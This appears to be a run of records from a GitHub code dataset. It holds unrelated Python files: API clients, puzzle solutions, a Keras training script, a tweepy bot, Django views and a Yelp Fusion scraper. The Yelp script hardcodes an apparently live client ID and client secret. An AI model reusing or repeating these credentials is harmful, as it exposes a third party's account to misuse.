\"\"\"\n try:\n body = {\n \"start_date\": star_date.strftime('%Y-%m-%d'),\n \"end_date\": end_date.strftime('%Y-%m-%d'),\n \"msp_ids\": [\n msp_account_id,\n ],\n }\n\n # Get usage of items to this msp_account_id\n usages = self.api_client.send(\n \"POST\", \"/api/v2/partners/oneview/usage/logs/summary\",\n body=body)\n\n usages_dict = json.loads(usages)\n\n usage = self._manage_usage(usages_dict)\n\n except MBClientException as ex:\n self.logger.error(f\"Failed get usage due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Usage got to MSP Account ID {msp_account_id}.\")\n\n return usage\n\n def _manage_usage(self, usages):\n\n items = {}\n for usage in usages:\n line_usage = usages.get(usage)\n for product_id, line_product in line_usage.items():\n if items.get(product_id):\n item = items[product_id]\n item['usage'] = item.get('usage') + line_product.get('usage')\n else:\n items[product_id] = line_product\n\n return items\n","repo_name":"cloudblue/processor-malwarebytes","sub_path":"malwarebytes/account/infrastructure/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":23845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27933768012","text":"# Write a program to find all pairs of an integer array whose sum is equal to a given number?\r\ndef find_pairs(arr, target):\r\n pairs = []\r\n seen = set()\r\n\r\n for num in arr:\r\n complement = target - num\r\n if complement in seen:\r\n pair = (min(num, complement), max(num, complement))\r\n pairs.append(pair)\r\n seen.add(num)\r\n\r\n return pairs\r\n\r\n# Example usage\r\nnums = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\ntarget_sum = 9\r\n\r\nresult = find_pairs(nums, target_sum)\r\nprint(f\"Pairs that sum up to {target_sum}:\")\r\nfor pair in result:\r\n print(pair)\r\n","repo_name":"prajaktasawan/Assignment_1-Linear-data-structure","sub_path":"Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10905279842","text":"#!/usr/bin/env python3\n\"\"\" Brute-force solution\nEvident\n(This is evident for python and other environment which supports big integer)\n\"\"\"\n\nfrom math import pow\n\nREQUEST = 1000\n\nif __name__ == '__main__':\n number = int(pow(2, REQUEST))\n digits = str(number)\n digits = [int(i) for i in digits]\n answer = sum(digits)\n print(answer)\n","repo_name":"JSYoo5B/TIL","sub_path":"PS/ProjectEuler/P016/bruteforce.py","file_name":"bruteforce.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16845192426","text":"from adventofcode2022 import read_file\n\n\ndef parse_file(file_content) -> list:\n rows = file_content.split(\"\\n\")\n rows = [[int(ele) for ele in _row] for _row in rows]\n return rows\n\n\ndef check_edge(coor: tuple, shape: tuple) -> bool:\n if 0 in coor or coor[0] == shape[0] - 1 or coor[1] == shape[1] - 1:\n return True\n else:\n return False\n\n\ndef check_visible(look_out: list) -> bool:\n # trees are visible to the edge of map\n visibility = [look_out[0] > ele for ele in look_out[1:]]\n return all(visibility)\n\n\ndef count_visible_trees(look_out: list) -> int:\n tree, remaining = look_out[0], look_out[1:]\n count = 0\n\n for ele in remaining:\n count += 1\n if ele >= tree:\n break\n return count\n\n\ndef count_visible(tree_map: list[list]) -> tuple:\n shape = (len(tree_map), len(tree_map[0]))\n count_visible, scenic_scores = 0, []\n\n for i in range(shape[0]):\n for j in range(shape[1]):\n if check_edge((i, j), shape):\n count_visible += 1\n else:\n up = [row[j] for row in tree_map[: i + 1]][::-1]\n down = [row[j] for row in tree_map[i:]]\n left = tree_map[i][: j + 1][::-1]\n right = tree_map[i][j:]\n\n up_visible = check_visible(up)\n down_visible = check_visible(down)\n left_visible = check_visible(left)\n right_visible = check_visible(right)\n\n if any([up_visible, down_visible, left_visible, right_visible]):\n count_visible += 1\n\n up_score = count_visible_trees(up)\n down_score = count_visible_trees(down)\n left_score = count_visible_trees(left)\n right_score = count_visible_trees(right)\n scenic_scores.append(up_score * down_score * left_score * right_score)\n\n return count_visible, max(scenic_scores)\n\n\nFILE_PATH = \"./input/day08.csv\"\ntree_map = parse_file(read_file(FILE_PATH))\nprint(count_visible(tree_map))\n","repo_name":"johnhendrick/adventofcode2022","sub_path":"adventofcode2022/day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26182532280","text":"\"\"\"By running this code, four Neural networks are trained and saved: two for estimating forward and backward end-points\n for each discrete state-input pairs; and two for estimating forward and backward growth bounds with respect\nto discrete inputs.\"\"\"\nimport os\nimport numpy as np\nimport math\nimport time\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\n\nimport env_pool\n#import levenberg_marquardt as lm\n\ndef discrete_sys_size_gen(x_range):\n \"\"\" This function computes a vector that contains number of\n discrete states for every dimension of state and input spaces.\"\"\"\n discrete_sys_size = np.zeros(dim_x + dim_u)\n for ii in range(0, dim_x):\n discrete_sys_size[ii] = math.floor((x_range[ii, 1] - x_range[ii, 0] - eta_x[ii]) / eta_x[ii] + 1)\n for ii in range(dim_x, dim_x + dim_u):\n discrete_sys_size[ii] = math.floor(\n (U_range[ii - dim_x, 1] - U_range[ii - dim_x, 0] - eta_u[ii - dim_x]) / eta_u[ii - dim_x] + 1)\n return discrete_sys_size.astype(int)\n\n\ndef NN_structure_TS():\n \"\"\"Create the model for estimating the transition system.\"\"\"\n model = Sequential()\n model.add(Dense(40, input_dim=dim_x+dim_u, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(160, activation=tf.nn.relu))\n model.add(Dense(500, activation=tf.nn.relu))\n model.add(Dense(800, activation=tf.nn.relu))\n model.add(Dense(nn, activation='linear'))\n return model\n\n\n\ndef My_Custom_Generator_TS(inp_filename, out_filename, num_samples, inp_dim, out_dim, batch_size):\n \"\"\"On-the-fly data Generator for the training process (random-read).\"\"\"\n inputs = []\n targets = []\n batchcount = 0\n indices = np.arange(num_samples)\n np.random.shuffle(indices)\n x = np.memmap(inp_filename, dtype='float32', mode='r', shape=(num_samples, inp_dim), offset=0)\n y = np.memmap(out_filename, dtype='float32', mode='r', shape=(num_samples, out_dim), offset=0)\n while True:\n for line in indices:\n \"\"\"if FW_or_BW:\n linee = transform_ind_BW_to_FW(line)\n else:\"\"\"\n linee = line\n inputs.append([x[linee, :]])\n targets.append([y[linee, :]])\n batchcount += 1\n if batchcount > batch_size:\n batch_x = np.array(inputs, dtype='float32')\n batch_y = np.array(targets, dtype='float32')\n yield (batch_x, batch_y)\n inputs = []\n targets = []\n batchcount = 0\n\n\n# Setting the parameters\nenv = env_pool.tora()\n\nX_range = env.X_range # state-space\nU_range = env.U_range # input space\nsample_time = env.sample_time # sampling time in seconds\neta_x = env.eta_x # state-space discretization size\neta_u = env.eta_u # input-space discretization size\nshift_no = env.shift_no # shifting the index vectors to avoid negative values\n# parallelization parameters\nlength = env.length\nnum_tasks_per_step = env.num_tasks_per_step\n# learning related settings\nepochs_TS = env.epochs_TS\nbatch_size_TS = env.batch_size_TS\nlearning_rate = env.learning_rate\n# defining filenames for saving the transition system (note that )\nforw_inp_TS_filename = env.forw_inp_TS_filename\nforw_out_TS_filename = env.forw_out_TS_filename\nback_inp_TS_filename = env.back_inp_TS_filename\nback_out_TS_filename = env.back_out_TS_filename\n\n# defining paths for saving the trained NNs\ncheckpoint_path_TS_forw = env.checkpoint_path_TS_forw\ncheckpoint_path_TS_back = env.checkpoint_path_TS_back\n\n\n\n\n\n# Extract descriptive parameters of the system\nrr_x = eta_x / 2 # radius of the partitions in the state-space\nrr_u = eta_u / 2 # radius of the partitions in the input-space\ndim_x = np.shape(X_range)[0] # dimension of the state-space\ndim_u = np.shape(U_range)[0] # dimension of the input-space\ndiscrete_sys_size = discrete_sys_size_gen(X_range) # vector containing number of discrete pointsalong each dimension in the\ndiscrete_inp_size = discrete_sys_size[dim_x:dim_x+dim_u]\nstate_space_size = discrete_sys_size[0:dim_x]\n\n\n# state and input spaces\nnum_dis_states = np.prod(discrete_sys_size[0:dim_x]).astype(int) # size of the state-space\nnum_dis_inputs = np.prod(discrete_sys_size[dim_x:dim_x + dim_u]).astype(int) # size of the input-space\nnum_state_inp_pairs = np.prod(discrete_sys_size).astype(int) # number of state-input pairs\nnn = 2 * (np.sum(discrete_sys_size[0:dim_x])+3*shift_no*dim_x) # dimension of the vector at the output of the trained NN\n\n# Training using TF 2.x\nnum_batches_TS = int(np.ceil(np.prod(discrete_sys_size).astype(int) / batch_size_TS))\n\n# Compile the model\nNN_TS_forw = NN_structure_TS()\nNN_TS_back = NN_structure_TS()\n# Training using TF 2.x\nlr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n learning_rate,\n decay_steps=math.ceil(num_state_inp_pairs/num_batches_TS),\n decay_rate=.999,\n staircase=True)\nNN_TS_forw.compile(loss='mean_squared_error',\n optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate/10, beta_1=.999, beta_2=.99999, name='Adam'),\n metrics=['mean_squared_error'])\nNN_TS_back.compile(loss='mean_squared_error',\n optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate/10, beta_1=.999, beta_2=.99999, name='Adam'),\n metrics=['mean_squared_error'])\n\n# using the lm method for curve fitting\n\"\"\"x_train = np.memmap(forw_inp_TS_filename, dtype='float32', mode='r', shape=(num_state_inp_pairs, dim_x+dim_u), offset=0)\ny_train = np.memmap(forw_out_TS_filename, dtype='float32', mode='r', shape=(num_state_inp_pairs, nn), offset=0)\n\ntrain_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))\ntrain_dataset = train_dataset.shuffle(num_state_inp_pairs)\ntrain_dataset = train_dataset.batch(batch_size_TS).cache()\ntrain_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\nmodel = NN_structure_TS()\nmodel.summary()\nmodel_wrapper = lm.ModelWrapper(\n tf.keras.models.clone_model(model))\nmodel_wrapper.compile(\n optimizer=tf.keras.optimizers.SGD(learning_rate=learning_rate),\n loss=lm.MeanSquaredError())\nhistory1 = model_wrapper.fit(train_dataset, epochs=epochs_TS)\"\"\"\n# Create a callback that saves the model's weights\ncp_callback_TS_forw = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path_TS_forw,\n save_weights_only=True,\n verbose=1)\ncp_callback_TS_back = tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_path_TS_back,\n save_weights_only=True,\n verbose=1)\n\n\n# Fit data to models using data written on disk+save the trained models\nstart = time.time()\n\n\"\"\"history1 = NN_TS_forw.fit(My_Custom_Generator_TS(forw_inp_TS_filename, forw_out_TS_filename, num_state_inp_pairs, dim_x+dim_u, nn, batch_size_TS),\n steps_per_epoch=num_batches_TS, epochs=epochs_TS, verbose=1, validation_split=0, callbacks=[cp_callback_TS_forw])\nprint(\"Execution time for FW training\", time.time() - start)\"\"\"\nhistory2 = NN_TS_back.fit(My_Custom_Generator_TS(back_inp_TS_filename, back_out_TS_filename, num_state_inp_pairs, dim_x+dim_u, nn, batch_size_TS),\n steps_per_epoch=num_batches_TS, epochs=epochs_TS, verbose=1, validation_split=0, callbacks=[cp_callback_TS_back])\nprint(\"Execution time for FW+BW training\", time.time() - start)\nprint(\"Execution time for full training\", time.time() - start)","repo_name":"msalamati/Neural-Representation","sub_path":"classification-based-synthesis-model-based/training_model_based.py","file_name":"training_model_based.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31207742715","text":"import pygame, sys\nfrom settings import *\nfrom level import Level\n\n# Pygame setup\npygame.init()\nscreen = pygame.display.set_mode((screen_width, screen_height), pygame.RESIZABLE)\nclock = pygame.time.Clock()\nlevel = Level(level_data)\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT or pygame.key.get_pressed()[pygame.K_q]:\n pygame.quit()\n sys.exit()\n\n screen.fill(\"black\")\n level.run()\n\n pygame.display.update()\n clock.tick(60)\n","repo_name":"B33th0v3n960/mario-clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4098143294","text":"#use of request module in python\n#imprting requests module\nimport requests\n\n#declaring and getting a request from http url\nr = requests.get(\"https://requests.readthedocs.io/en/latest/\")\nprint(r.text) #printing a text from requests which is html code because of random url\n\nurl = \"www.somthing.com\"\ndata = {\n \"p1\": 4,\n \"p2\": 8,\n}\nr2 = requests.post(url = url, data = data)\n\n#For more informaiton you can serch it on a documentation of requests module and for your future work\n\n\n\n\n\n\n\n\n","repo_name":"yapranav09v/python-Tutorial","sub_path":"#5after oops python/UseRequestModule.py","file_name":"UseRequestModule.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"2935016814","text":"# just a example\n# use it in each script\n\nimport numpy as np\nimport keras.backend as K\nfrom keras import Model\nfrom keras.layers import Dense, Input\n\ndef get_model(num_class):\n input = Input([5,])()\n print(base_model.summary())\n x = base_model.get_layer(\"bn\").output\n # x = base_model.get_layer(\"block5_pool\").output\n\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(num_class, activation='softmax')(x)\n\n model = Model(inputs=base_model.input, outputs=predictions)\n\n sgd = SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n return model\nmodel = Model\n\nf = K.function([model.layers[0].input, K.learning_phase()],\n [model.layers[-1].output])\n\ndef predict_with_uncertainty(f, x, n_iter=10):\n result = np.zeros((n_iter,) + x.shape)\n\n for iter in range(n_iter):\n result[iter] = f(x, 1)\n\n prediction = result.mean(axis=0)\n uncertainty = result.var(axis=0)\n return prediction, uncertainty","repo_name":"OsciiArt/Cookpad","sub_path":"predict_with_uncertainty.py","file_name":"predict_with_uncertainty.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36884056904","text":"try:\r\n import plotly.graph_objects as grob\r\n import yfinance\r\nexcept ModuleNotFoundError:\r\n import os\r\n os.system(\"pip install plotly\")\r\n os.system(\"pip install yfinance\")\r\n\r\nstock = yfinance.Ticker('MSFT')\r\npast = stock.history(period = '1y')\r\n\r\nplot = grob.Figure(data = grob.Scatter(x=past.index,y=past['Close'], mode='lines'))\r\nplot.show()","repo_name":"Wanderer0074348/Single_File_Projects","sub_path":"Stock_Trendline.py","file_name":"Stock_Trendline.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73879606841","text":"\nfrom django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom users.views import UserViewSet, UserLogIn\n\nrouter = DefaultRouter()\nrouter.register(r'users', UserViewSet)\n\nurlpatterns = [\n path('users/login/', UserLogIn.as_view()),\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n] ","repo_name":"dev-muhammad/Django-course","sub_path":"my_project/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"40"} +{"seq_id":"6609306711","text":"import random\n# import pandas as pd, numpy as np\nimport requests\nimport json\nimport time\nfrom picker import ipHandler\nfrom picker import config\n\ndef pickPlace():\n # declare an array of places to choose from\n all_places = []\n keywords = ['restaurant']\n api_key = config.api_key\n radius = '1000'\n coordinates = ipHandler.get_location() # obtain coords from ip addr\n city = ipHandler.get_city()\n print('Searching {0} within radius {1}...'.format(city, radius))\n # print(coordinates)\n\n for keyword in keywords:\n url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?location='+coordinates+'&radius='+str(radius)+'&keyword='+str(keyword)+'&key='+str(api_key)\n while(True):\n # print(url)\n respon = requests.get(url)\n jj = json.loads(respon.text)\n results = jj['results']\n for result in results:\n name = result['name']\n place_id = result['place_id']\n lat = result['geometry']['location']['lat']\n lng = result['geometry']['location']['lng']\n rating = result['rating']\n types = result['types']\n vicinity = result['vicinity']\n place = [name, place_id, lat, lng, rating, types, vicinity]\n all_places.append(place)\n\n if 'next_page_token' not in jj:\n break\n else:\n next_page_token = jj['next_page_token']\n url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?key='+str(api_key)+'&pagetoken='+str(next_page_token)\n continue\n labels = ['Place Name', 'Place ID', 'Latitude', 'Longitude', 'Rating', 'Types', 'Vicinity']\n # [ 0 1 2 3 4 5 6 ]\n \n # code that exports data to csv file if needed\n # export_dataframe_1_medium = pd.DataFrame.from_records(all_places, columns=labels)\n # export_dataframe_1_medium.to_csv('export_dataframe_1_medium.csv')\n \n x = 0\n y = len(all_places) - 1\n random_index = random.randint(x,y)\n\n name = all_places[random_index][0]\n rating = all_places[random_index][4]\n address = all_places[random_index][6]\n time.sleep(3)\n # print('I suggest \"{0}\" with a rating of {1} at \"{2}\"'.format(name, rating, address))\n return \"I suggest \" + str(name) + \" with a rating of \" + str(rating) + \" at \" + str(address)\n\n\ndef hello():\n print('Hello from place picker!')","repo_name":"Marcusk19/Place-Picker","sub_path":"picker/src/picker/placePicker.py","file_name":"placePicker.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18874283637","text":"#백준 카드 2\nfrom collections import deque# 콜렉션 큐 자료구조 사용\n\nn=int(input())\nqueue = deque([i for i in range(1,n+1)])#1~n까지의 큐 생성\ni=1\nwhile len(queue)>1:#큐의 길이가 1보다 크면 반복\n if i%2==1:#위치가 홀수일 때\n queue.popleft()#맨 앞 요소 제거\n i+=1\n else:#위치가 짝수일 때\n queue.append(queue[0])#맨 앞 요소를 맨 뒤로 이동\n queue.popleft()#맨 앞 요소 제거\n i+=1\nprint(queue[0])\n","repo_name":"world970511/study","sub_path":"Python-study/bj/card2.py","file_name":"card2.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71334574201","text":"from ..models import Article, Community\nfrom ..serializer import ArticleSerializer\nfrom ..serializer import CommunityArticlesSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom django.http import Http404\nfrom rest_framework.response import Response\nfrom rest_framework.generics import get_object_or_404\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny\n\n\nclass ArticleList(APIView):\n authentication_classes = []\n permission_classes = [AllowAny, ]\n # 記事一覧\n\n def get(self, request, format=None):\n article = Article.objects.all()\n serializer = ArticleSerializer(article, many=True)\n return Response(serializer.data)\n\n # 投稿作成\n def post(self, request, format=None):\n serializer = ArticleSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ArticleDetail(APIView):\n def get_object(self, pk):\n try:\n return Article.objects.get(pk=pk)\n except Article.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n snippet = self.get_object(pk)\n serializer = ArticleSerializer(snippet)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n snippet = self.get_object(pk)\n serializer = ArticleSerializer(snippet, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n snippet = self.get_object(pk)\n snippet.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CommunityArticleList(APIView):\n authentication_classes = []\n permission_classes = [AllowAny, ]\n\n def get(self, request, community_id, *args, **kwargs):\n communities = get_object_or_404(Community, pk=community_id)\n serializer = CommunityArticlesSerializer(communities)\n return Response(\n serializer.data,\n )\n","repo_name":"jphacks/F_2204","sub_path":"backend/rest_api/views/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30278062658","text":"import tweepy\nimport config\n\n# client = tweepy.Client(consumer_key=config.API_KEY,\n# consumer_secret=config.API_SECRET,\n# access_token=config.ACCESS_TOKEN,\n# access_token_secret=config.ACCESS_TOKEN_SECRET)\n\n# response = client.create_tweet()\n\ndef api():\n auth = tweepy.OAuthHandler(config.API_KEY, config.API_SECRET)\n auth.set_access_token(config.ACCESS_TOKEN, config.ACCESS_TOKEN_SECRET)\n\n return tweepy.API(auth)\n\ndef tweet(api: tweepy.API, message: str):\n api.update_status(message)\n print('Tweet success!')\n\n# define a function that will ping the CalTrans api and then pull the road conditions\n\napi = api()\n# tweet(api, 'E&J tweeting from Python!') -- the initial test to tweet from python\n\n# import in tweetpy\n# https://www.youtube.com/watch?v=2UBcRiddwAo <-- use this vid\n\n# import in the keys in a file that will be ignored on git pushes\n\n\n# create an Oauth with the access tokens and secrets\n\n# define a tweet function that will invoke tweet posts-- \n\n# have proper authorization for the access tokens to be able to read write and dm management\n","repo_name":"jemzir/soCal-snowBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"22233012259","text":"import os\nimport networkx as nx\n\nTRANSLATION = { 'adjacent': 'connected to', 'at': \"located in\", 'had': 'had',\n 'in': \"located in\", 'has': 'has', 'burried': 'buried'}\n\ndef getNodes(domain, problem):\n pr = False\n objects = {}\n\n d = open(domain)\n for line in d:\n if line.strip().startswith(\"(:constants\"): pr = True\n if pr:\n prline = line.strip().replace(\"(:constants \", \"\").strip(')')\n prline = prline.split()\n t = False\n wl = []\n for i in prline:\n if t == True:\n type = i\n elif i == '-':\n t = True\n else:\n wl.append(i)\n objects[type] = wl\n if pr and ')' in line: pr = False\n d.close()\n\n p = open(problem)\n for line in p:\n if line.strip().startswith(\"(:objects\"): pr = True\n if pr:\n prline = line.strip().replace(\"(:objects \", \"\").strip(')')\n prline = prline.split()\n t = False\n wl = []\n for i in prline:\n if t == True:\n type = i\n elif i == '-':\n t = True\n else:\n wl.append(i)\n if type in objects: objects[type] += wl\n else: objects[type] = wl\n if pr and ')' in line: pr = False\n p.close()\n\n return objects\n\ndef makeRelations(problem, graph):\n #the relation names are:\n #\"at\" character to location\n #\"adjacent\" location to location\n #\"has\" item to character\n #\"in\" item to location\n pr = False\n p = open(problem)\n for line in p:\n if line.strip().startswith(\"(:init\"): pr = True\n if pr:\n prline=line.strip().replace(\"(:init \", \"\").strip(\"()\")\n prline=prline.split()\n if len(prline) == 0:\n break\n relation = prline[0]\n if relation.startswith(':'): pr = False\n if len(prline) > 1 and relation in TRANSLATION.keys():\n i1, i2 = prline[1],prline[2]\n e = (i1, i2, {\"label\": 'has'})\n l = TRANSLATION[relation]\n if not (l == 'had' and (graph.has_edge(*e[:2]))):\n graph.add_edge(i1, i2, label = TRANSLATION[relation])\n if len(prline) == 1:\n graph.add_nodes_from([relation], type='statement', fillcolor = \"red\", style = 'filled')\n p.close()\n return graph\n\ndef makeNodes(objects):\n graph = nx.Graph()\n graph.add_nodes_from(objects[\"room\"], type='location', fillcolor=\"yellow\", style=\"filled\")\n graph.add_nodes_from(objects[\"item\"], type='object', fillcolor=\"white\", style=\"filled\")\n graph.add_nodes_from(objects[\"character\"], type='character', fillcolor=\"orange\", style=\"filled\")\n\n return graph\n\ndef getWG( problem = 'tests/door-problem.pddl',\n domain = 'tests/door-domain.pddl',\n output = 'log/graph.dot'):\n objects = getNodes(domain, problem)\n g = makeNodes(objects)\n g = makeRelations(problem, g)\n\n nx.nx_pydot.write_dot(g, output)\n\nif __name__ == \"main\":\n objects = getNodes(\"door-domain.pddl\", \"door-problem-output.pddl\")\n print(objects)\n g = makeNodes(objects)\n g = makeRelations(\"door-problem-output.pddl\", g)\n\n nx.nx_pydot.write_dot(g, \"door.dot\")\n","repo_name":"sammo4gun/DungeonRunner","sub_path":"BardStep/WStoWG.py","file_name":"WStoWG.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30311077026","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThe code below is adapted from the Yelp Fusion API code sample.\n\nThis program demonstrates the capability of the Yelp Fusion API\nby using the Search API to query for businesses by a search term and location,\nand the Business API to query additional information about the top result\nfrom the search query.\n\nPlease refer to http://www.yelp.com/developers/v3/documentation for the API\ndocumentation.\n\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport json\nimport pprint\nimport requests\nimport sys\nimport urllib\nimport pandas\nimport time\nimport numpy as np\nimport datetime\nimport csv\nimport pandas as pd\n\n\n# This client code can run on Python 2.x or 3.x. Your imports can be\n# simpler if you only need one of those.\ntry:\n # For Python 3.0 and later\n from urllib.error import HTTPError\n from urllib.parse import quote\n from urllib.parse import urlencode\nexcept ImportError:\n # Fall back to Python 2's urllib2 and urllib\n from urllib2 import HTTPError\n from urllib import quote\n from urllib import urlencode\n\n\n# OAuth credential placeholders that must be filled in by users.\n# You can find them on\n# https://www.yelp.com/developers/v3/manage_app\nCLIENT_ID = \"2Slx3F97ZFV4IU3uImzXaw\"\nCLIENT_SECRET = \"9F6P1Y3SZRdHg1gYMZMxEJQLjer2TUI6IMe1wAEFbTLW6wxi2gNGcuubT1s8NyyA\"\n\n\n# API constants, you shouldn't have to change these.\nAPI_HOST = 'https://api.yelp.com'\nSEARCH_PATH = '/v3/businesses/search'\nBUSINESS_PATH = '/v3/businesses/' # Business ID will come after slash.\nTOKEN_PATH = '/oauth2/token'\nGRANT_TYPE = 'client_credentials'\n\n\n# Defaults for our simple example.\nDEFAULT_TERM = 'restaurant'\nDEFAULT_LOCATION = 'Houston, TX'\nSEARCH_LIMIT = 50\nOFFSET = 0\n\n# list to save all json results.\nl=[]\n\n# load review given known business ids.\nbtable = pd.read_csv(\"d:/my_env/bcsdineout/data/business_table2017-09-14 21-44-00.756000.csv\",\n sep=',')\nBU = btable['Restaurant_id']\n\n\ndef obtain_bearer_token(host, path):\n \"\"\"Given a bearer token, send a GET request to the API.\n\n Args:\n host (str): The domain host of the API.\n path (str): The path of the API after the domain.\n url_params (dict): An optional set of query parameters in the request.\n\n Returns:\n str: OAuth bearer token, obtained using client_id and client_secret.\n\n Raises:\n HTTPError: An error occurs from the HTTP request.\n \"\"\"\n url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n assert CLIENT_ID, \"Please supply your client_id.\"\n assert CLIENT_SECRET, \"Please supply your client_secret.\"\n data = urlencode({\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'grant_type': GRANT_TYPE,\n })\n headers = {\n 'content-type': 'application/x-www-form-urlencoded',\n }\n response = requests.request('POST', url, data=data, headers=headers)\n bearer_token = response.json()['access_token']\n return bearer_token\n\n\ndef request(host, path, bearer_token, url_params=None):\n \"\"\"Given a bearer token, send a GET request to the API.\n\n Args:\n host (str): The domain host of the API.\n path (str): The path of the API after the domain.\n bearer_token (str): OAuth bearer token, obtained using client_id and client_secret.\n url_params (dict): An optional set of query parameters in the request.\n\n Returns:\n dict: The JSON response from the request.\n\n Raises:\n HTTPError: An error occurs from the HTTP request.\n \"\"\"\n url_params = url_params or {}\n url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % bearer_token,\n }\n\n print(u'Querying {0} ...'.format(url))\n\n response = requests.request('GET', url, headers=headers, params=url_params)\n\n return response.json()\n\n\ndef search(bearer_token, term, location):\n \"\"\"Query the Search API by a search term and location.\n\n Args:\n term (str): The search term passed to the API.\n location (str): The search location passed to the API.\n\n Returns:\n dict: The JSON response from the request.\n \"\"\"\n\n url_params = {\n 'term': term.replace(' ', '+'),\n 'location': location.replace(' ', '+'),\n 'limit': SEARCH_LIMIT,\n 'offset': OFFSET\n }\n return request(API_HOST, SEARCH_PATH, bearer_token, url_params=url_params)\n\n\ndef get_business(bearer_token, business_id):\n \"\"\"Query the Business API by a business ID.\n\n Args:\n business_id (str): The ID of the business to query.\n\n Returns:\n dict: The JSON response from the request.\n \"\"\"\n business_path = BUSINESS_PATH + business_id\n\n return request(API_HOST, business_path, bearer_token)\n\ndef get_business_review(bearer_token, business_id):\n \"\"\"Query the Review API by a business ID.\n\n Args:\n business_id (str): The ID of the business to query.\n\n Returns:\n dict: The JSON response from the request.\n \"\"\"\n review_path = BUSINESS_PATH + business_id + '/reviews'\n\n return request(API_HOST, review_path, bearer_token)\n\n\ndef query_api(term, location):\n \"\"\"Queries the API by the input values from the user.\n\n Args:\n term (str): The search term to query.\n location (str): The location of the business to query.\n \"\"\"\n bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n\n response = search(bearer_token, term, location)\n \n# Below is an example to load business from standard Yelp API.\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n\n for b in businesses: \n business_id = b['id']\n \n \n # this part is to get business details.\n print(u'{0} businesses found, querying business info ' 